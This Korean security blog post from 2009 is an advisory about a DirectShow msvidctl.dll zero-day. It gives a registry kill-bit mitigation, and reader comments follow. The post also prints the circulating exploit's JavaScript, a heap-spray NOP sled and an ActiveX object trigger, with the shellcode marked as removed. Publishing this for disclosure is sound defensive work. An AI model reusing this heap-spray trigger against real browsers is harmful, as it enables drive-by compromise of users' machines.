DirectShow (msvidctl.dll) 제로데이
DirectShow의 msVidCtl 컴포넌트를 공격하는 제로데이 익스플로잇이 퍼지고 있습니다. 임시 대응책으로 레지스트리에 아래 kill bit을 설정하시면 됩니다.
clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
익스플로잇은 아래와 같습니다.
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
[SHELL CODE REMOVED]
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
by xeraph | 2009-07-06 20:55:02 | 권고문 | 트랙백 (0) | 덧글 (2)
msVidCtl.dll 의 다른 ActiveX에 대해서도 kill bit 설정하란 내용이 추가되었습니다.
http://go.microsoft.com/?linkid=9672398
nchovy 가 위험을 알리는 본부가 되면 좋을거 같에요~.~
정보 감사합니다~